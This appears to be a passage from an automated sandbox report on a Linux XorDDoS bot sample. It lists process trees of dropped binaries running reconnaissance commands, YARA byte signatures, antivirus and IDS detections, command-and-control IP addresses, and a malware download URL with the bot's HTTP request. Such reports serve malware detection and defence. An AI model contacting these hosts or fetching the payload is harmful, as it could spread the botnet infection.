        • bsvlwqppmd (PID: 6599, Parent: 1860, MD5: 205f8a5a8b0d1f6be71274fa6ff34534) Arguments: /usr/bin/bsvlwqppmd whoami 6205
      • 1.elf New Fork (PID: 6600, Parent: 6205)
        • 1.elf New Fork (PID: 6602, Parent: 6600)
        • bsvlwqppmd (PID: 6602, Parent: 1860, MD5: 205f8a5a8b0d1f6be71274fa6ff34534) Arguments: /usr/bin/bsvlwqppmd "grep \"A\"" 6205
      • 1.elf New Fork (PID: 6603, Parent: 6205)
        • 1.elf New Fork (PID: 6604, Parent: 6603)
        • bsvlwqppmd (PID: 6604, Parent: 1860, MD5: 205f8a5a8b0d1f6be71274fa6ff34534) Arguments: /usr/bin/bsvlwqppmd "sleep 1" 6205
      • 1.elf New Fork (PID: 6606, Parent: 6205)
        • 1.elf New Fork (PID: 6608, Parent: 6606)
        • bsvlwqppmd (PID: 6608, Parent: 1860, MD5: 205f8a5a8b0d1f6be71274fa6ff34534) Arguments: /usr/bin/bsvlwqppmd "netstat -antop" 6205
      • 1.elf New Fork (PID: 6613, Parent: 6205)
        • 1.elf New Fork (PID: 6614, Parent: 6613)
        • uhjknuzvai (PID: 6614, Parent: 6613, MD5: 91456298716554fecad3edd5ee4b700a) Arguments: /usr/bin/uhjknuzvai "route -n" 6205
      • 1.elf New Fork (PID: 6615, Parent: 6205)
        • 1.elf New Fork (PID: 6616, Parent: 6615)
        • uhjknuzvai (PID: 6616, Parent: 1860, MD5: 91456298716554fecad3edd5ee4b700a) Arguments: /usr/bin/uhjknuzvai "ls -la" 6205
      • 1.elf New Fork (PID: 6617, Parent: 6205)
        • 1.elf New Fork (PID: 6619, Parent: 6617)
        • uhjknuzvai (PID: 6619, Parent: 1860, MD5: 91456298716554fecad3edd5ee4b700a) Arguments: /usr/bin/uhjknuzvai "sleep 1" 6205
      • 1.elf New Fork (PID: 6620, Parent: 6205)
        • 1.elf New Fork (PID: 6621, Parent: 6620)
        • uhjknuzvai (PID: 6621, Parent: 1860, MD5: 91456298716554fecad3edd5ee4b700a) Arguments: /usr/bin/uhjknuzvai pwd 6205
      • 1.elf New Fork (PID: 6624, Parent: 6205)
        • 1.elf New Fork (PID: 6625, Parent: 6624)
        • uhjknuzvai (PID: 6625, Parent: 1860, MD5: 91456298716554fecad3edd5ee4b700a) Arguments: /usr/bin/uhjknuzvai bash 6205
      • 1.elf New Fork (PID: 6630, Parent: 6205)
        • 1.elf New Fork (PID: 6631, Parent: 6630)
        • lkpssqmflq (PID: 6631, Parent: 6630, MD5: e3edc5b700334c5fb57de877def5e6a9) Arguments: /usr/bin/lkpssqmflq top 6205
      • 1.elf New Fork (PID: 6632, Parent: 6205)
        • 1.elf New Fork (PID: 6633, Parent: 6632)
        • lkpssqmflq (PID: 6633, Parent: 1860, MD5: e3edc5b700334c5fb57de877def5e6a9) Arguments: /usr/bin/lkpssqmflq top 6205
      • 1.elf New Fork (PID: 6634, Parent: 6205)
        • 1.elf New Fork (PID: 6636, Parent: 6634)
        • lkpssqmflq (PID: 6636, Parent: 1860, MD5: e3edc5b700334c5fb57de877def5e6a9) Arguments: /usr/bin/lkpssqmflq su 6205
      • 1.elf New Fork (PID: 6637, Parent: 6205)
        • 1.elf New Fork (PID: 6638, Parent: 6637)
        • lkpssqmflq (PID: 6638, Parent: 1860, MD5: e3edc5b700334c5fb57de877def5e6a9) Arguments: /usr/bin/lkpssqmflq gnome-terminal 6205
      • 1.elf New Fork (PID: 6641, Parent: 6205)
        • 1.elf New Fork (PID: 6642, Parent: 6641)
        • lkpssqmflq (PID: 6642, Parent: 1860, MD5: e3edc5b700334c5fb57de877def5e6a9) Arguments: /usr/bin/lkpssqmflq "ifconfig eth0" 6205
  • systemd New Fork (PID: 6217, Parent: 6216)
  • snapd-env-generator (PID: 6217, Parent: 6216, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
SourceRuleDescriptionAuthorStrings
1.elfJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
    1.elfLinux_Trojan_Xorddos_2aef46a6unknownunknown
    • 0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
    1.elfLinux_Trojan_Xorddos_0eb147caunknownunknown
    • 0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
    • 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
    1.elfLinux_Trojan_Xorddos_884cab60unknownunknown
    • 0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
    • 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
    1.elfLinux_Trojan_Xorddos_ba961ed2unknownunknown
    • 0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
    Click to see the 3 entries
    SourceRuleDescriptionAuthorStrings
    /usr/bin/ssrfvzfvpkJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
      /usr/bin/ssrfvzfvpkLinux_Trojan_Xorddos_2aef46a6unknownunknown
      • 0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
      /usr/bin/ssrfvzfvpkLinux_Trojan_Xorddos_0eb147caunknownunknown
      • 0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
      • 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
      /usr/bin/ssrfvzfvpkLinux_Trojan_Xorddos_884cab60unknownunknown
      • 0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
      • 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
      /usr/bin/ssrfvzfvpkLinux_Trojan_Xorddos_ba961ed2unknownunknown
      • 0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
      Click to see the 106 entries
      SourceRuleDescriptionAuthorStrings
      6475.1.0000000008048000.00000000080cf000.r-x.sdmpJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
        6475.1.0000000008048000.00000000080cf000.r-x.sdmpLinux_Trojan_Xorddos_2aef46a6unknownunknown
        • 0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
        6475.1.0000000008048000.00000000080cf000.r-x.sdmpLinux_Trojan_Xorddos_0eb147caunknownunknown
        • 0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
        • 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
        6475.1.0000000008048000.00000000080cf000.r-x.sdmpLinux_Trojan_Xorddos_884cab60unknownunknown
        • 0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
        • 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
        6475.1.0000000008048000.00000000080cf000.r-x.sdmpLinux_Trojan_Xorddos_ba961ed2unknownunknown
        • 0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
        Click to see the 772 entries
        Timestamp:192.168.2.23142.0.138.4143268802021336 10/26/23-20:30:47.799532
        SID:2021336
        Source Port:43268
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23142.0.138.444698615252020381 10/26/23-20:31:08.890920
        SID:2020381
        Source Port:46986
        Destination Port:1525
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 1.elfAvira: detected
        Source: 1.elfMalware Configuration Extractor: XorDDoS {"C2 list": []}
        Source: 1.elfReversingLabs: Detection: 86%
        Source: /usr/bin/vlteqhfomzAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/lkzqkklpfrAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/vapcvdizxxAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/wxysocrflfAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/uaewjndsweAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/lib/libudev.soAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/efgdvbpuxxAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/nxattrsdxmAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/dyuvutukkiAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/ezztyrfjzfAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/bjhrrojebvAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/ccxfvtbhgrAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/ssrfvzfvpkAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/cpbnjarsklAvira: detection malicious, Label: LINUX/Xorddos.cona
        Source: /usr/bin/vlteqhfomzJoe Sandbox ML: detected
        Source: /usr/bin/lkzqkklpfrJoe Sandbox ML: detected
        Source: /usr/bin/vapcvdizxxJoe Sandbox ML: detected
        Source: /usr/bin/wxysocrflfJoe Sandbox ML: detected
        Source: /usr/bin/uaewjndsweJoe Sandbox ML: detected
        Source: /usr/lib/libudev.soJoe Sandbox ML: detected
        Source: /usr/bin/efgdvbpuxxJoe Sandbox ML: detected
        Source: /usr/bin/nxattrsdxmJoe Sandbox ML: detected
        Source: /usr/bin/dyuvutukkiJoe Sandbox ML: detected
        Source: /usr/bin/ezztyrfjzfJoe Sandbox ML: detected
        Source: /usr/bin/bjhrrojebvJoe Sandbox ML: detected
        Source: /usr/bin/ccxfvtbhgrJoe Sandbox ML: detected
        Source: /usr/bin/ssrfvzfvpkJoe Sandbox ML: detected
        Source: /usr/bin/cpbnjarsklJoe Sandbox ML: detected
        Source: 1.elfJoe Sandbox ML: detected
        Source: /tmp/1.elf (PID: 6205)Reads CPU info from proc file: /proc/cpuinfoJump to behavior

        Networking

        barindex
        Source: TrafficSnort IDS: 2021336 ET TROJAN DDoS.XOR Checkin via HTTP 192.168.2.23:43268 -> 142.0.138.41:80
        Source: TrafficSnort IDS: 2020381 ET TROJAN DDoS.XOR Checkin 192.168.2.23:46986 -> 142.0.138.44:1525
        Source: global trafficTCP traffic: 192.168.2.23:54826 -> 34.98.99.30:1525
        Source: global trafficTCP traffic: 192.168.2.23:39860 -> 142.4.106.74:1525
        Source: global trafficTCP traffic: 192.168.2.23:46986 -> 142.0.138.44:1525
        Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: 1.elf, vlteqhfomz.11.dr, lkzqkklpfr.11.dr, vapcvdizxx.11.dr, wxysocrflf.11.dr, uaewjndswe.11.dr, libudev.so.11.dr, efgdvbpuxx.11.dr, nxattrsdxm.11.dr, dyuvutukki.11.dr, ezztyrfjzf.11.dr, bjhrrojebv.11.dr, ccxfvtbhgr.11.dr, ssrfvzfvpk.11.dr, cpbnjarskl.11.drString found in binary or memory: http://www.gnu.org/software/libc/bugs.html
        Source: 1.elf, 6204.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6206.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6207.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6208.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6238.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6241.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6244.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6246.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6249.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6257.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6260.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6263.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6265.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6268.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6274.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6277.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6279.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6282.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6285.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6312.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6315.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar
        Source: 1.elf, 6204.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6206.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6207.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6208.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9/t
        Source: 1.elf, 6488.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6491.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6494.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6496.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6499.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9bh
        Source: 1.elf, 6419.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6422.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6424.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6427.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6430.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9bj
        Source: 1.elf, 6238.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6241.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6244.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6246.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6249.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cc
        Source: 1.elf, 6346.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6349.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6351.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6354.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6357.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cp
        Source: 1.elf, 6505.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6508.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6510.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6513.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6516.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ct
        Source: 1.elf, 6274.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6277.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6279.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6282.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6285.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9dy
        Source: 1.elf, 6382.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6385.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6388.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6390.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6393.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ef
        Source: 1.elf, 6257.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6260.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6263.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6265.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6268.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ez
        Source: 1.elf, 6524.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6527.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6529.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6533.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6535.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gg
        Source: 1.elf, 6542.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6545.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gv
        Source: 1.elf, 6329.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6332.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6335.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6337.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6340.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9lk
        Source: 1.elf, 6402.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6405.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6408.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6411.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6414.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9nx
        Source: 1.elf, 6470.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6473.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6475.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6478.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6482.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ss
        Source: 1.elf, 6363.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6366.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6368.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6371.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6374.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ua
        Source: 1.elf, 6312.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6315.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6317.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6320.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6323.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9va
        Source: 1.elf, 6436.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6439.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6441.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6444.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6447.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9vl
        Source: 1.elf, 6453.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6456.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6458.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6461.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6464.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmpString found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wx
        Source: unknownDNS traffic detected: queries for: www1.gggatat456.com
        Source: global trafficHTTP traffic detected: GET /dd.rar HTTP/1.1Accept: */*Accept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)Host: www1.gggatat456.comConnection: Keep-Alive

        DDoS

        barindex
        Source: Yara matchFile source: 1.elf, type: SAMPLE
        Source: Yara matchFile source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
